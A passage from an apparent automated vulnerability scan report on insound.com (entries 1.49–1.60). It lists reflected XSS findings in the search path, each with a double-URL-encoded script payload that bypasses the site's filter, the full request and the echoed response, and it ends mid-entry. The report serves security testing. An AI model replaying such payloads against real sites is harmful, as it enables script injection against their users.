X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5kooidaq81edal98j9e9vovce4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=229923999; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=519800143; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candlebox 2433b"><script>alert(1)</script>bc8ce133cab" />
...[SNIP]...

1.49. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlemass&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 305c7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e14956eb823c was submitted in the REST URL parameter 3. This input was echoed as 305c7</title><script>alert(1)</script>14956eb823c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candlemass305c7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e14956eb823c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kkedspan8dfvglcovsd4afd805; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=527840965; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=471215466; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candlemass305c7</title><script>alert(1)</script>14956eb823c</title>
...[SNIP]...

1.50. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlemass&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b265494035 was submitted in the REST URL parameter 3. This input was echoed as 41c7e"><script>alert(1)</script>2b265494035 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candlemass41c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b265494035&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5pcsvfiicild36p51amor3tq16; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=241737989; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=266945355; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candlemass41c7e"><script>alert(1)</script>2b265494035" />
...[SNIP]...

1.51. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Bars&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0276d94bb6 was submitted in the REST URL parameter 3. This input was echoed as deb13"><script>alert(1)</script>a0276d94bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candy%20Barsdeb13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0276d94bb6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0b71lc4ke7rkv8f05vodsdv535; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=428406454; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=203325106; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candy Barsdeb13"><script>alert(1)</script>a0276d94bb6" />
...[SNIP]...

1.52. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Bars&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 54e69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e993e8d654d2 was submitted in the REST URL parameter 3. This input was echoed as 54e69</title><script>alert(1)</script>993e8d654d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candy%20Bars54e69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e993e8d654d2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=q8cosbl17gd7kurimhcj45cfk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=474164681; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=355844345; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candy Bars54e69</title><script>alert(1)</script>993e8d654d2</title>
...[SNIP]...

1.53. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Claws&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6246%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eeb5d00fd0e3 was submitted in the REST URL parameter 3. This input was echoed as d6246"><script>alert(1)</script>eb5d00fd0e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candy%20Clawsd6246%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eeb5d00fd0e3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=07i2k805k6q459tkbkpihsb3o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=280059512; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=83596684; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candy Clawsd6246"><script>alert(1)</script>eb5d00fd0e3" />
...[SNIP]...

1.54. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Claws&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 40b9b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a240c2ee7f was submitted in the REST URL parameter 3. This input was echoed as 40b9b</title><script>alert(1)</script>7a240c2ee7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candy%20Claws40b9b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a240c2ee7f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2m3m6iv3gr69j53mr1o0tumk72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=469748567; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=298062000; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candy Claws40b9b</title><script>alert(1)</script>7a240c2ee7f</title>
...[SNIP]...

1.55. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Snatchers&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2ca8b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30d17cf6bd8 was submitted in the REST URL parameter 3. This input was echoed as 2ca8b</title><script>alert(1)</script>30d17cf6bd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candy%20Snatchers2ca8b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30d17cf6bd8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=a2v0llh44cdem12nhhf94gvk43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=221056369; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=105961041; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candy Snatchers2ca8b</title><script>alert(1)</script>30d17cf6bd8</title>
...[SNIP]...

1.56. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candy%20Snatchers&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3adb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8968e5029bc was submitted in the REST URL parameter 3. This input was echoed as 3adb7"><script>alert(1)</script>8968e5029bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candy%20Snatchers3adb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8968e5029bc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=97a1begkmeb910qtnjjn7d5o73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=556728426; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=65384639; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candy Snatchers3adb7"><script>alert(1)</script>8968e5029bc" />
...[SNIP]...

1.57. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candyskins&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ac8e9c7a2d was submitted in the REST URL parameter 3. This input was echoed as 529f5"><script>alert(1)</script>9ac8e9c7a2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candyskins529f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ac8e9c7a2d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mqjgvkonbu2lf1svf83phb1g92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=561458590; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=496896762; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candyskins529f5"><script>alert(1)</script>9ac8e9c7a2d" />
...[SNIP]...

1.58. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candyskins&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 783a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eab33f8a4e was submitted in the REST URL parameter 3. This input was echoed as 783a3</title><script>alert(1)</script>9eab33f8a4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candyskins783a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eab33f8a4e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d721auoi1503uhfnup26uvhsj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:20 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=514777627; expires=Sun, 09-Jan-2011 02:39:20 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=313139826; expires=Sun, 09-Jan-2011 02:39:20 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candyskins783a3</title><script>alert(1)</script>9eab33f8a4e</title>
...[SNIP]...

1.59. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canned%20Heat&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41aff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed026fc4a7ff was submitted in the REST URL parameter 3. This input was echoed as 41aff"><script>alert(1)</script>d026fc4a7ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canned%20Heat41aff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed026fc4a7ff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6hh5tggsnb108ebi3sqkb725o5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=424517373; expires=Sun, 09-Jan-2011 02:39:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=555535607; expires=Sun, 09-Jan-2011 02:39:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canned Heat41aff"><script>alert(1)</script>d026fc4a7ff" />
...[SNIP]...

1.60. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canned%20Heat&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 87cee%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e945b3aae3a0 was submitted in the REST URL parameter 3. This input was echoed as 87cee</title><script>alert(1)</script>945b3aae3a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

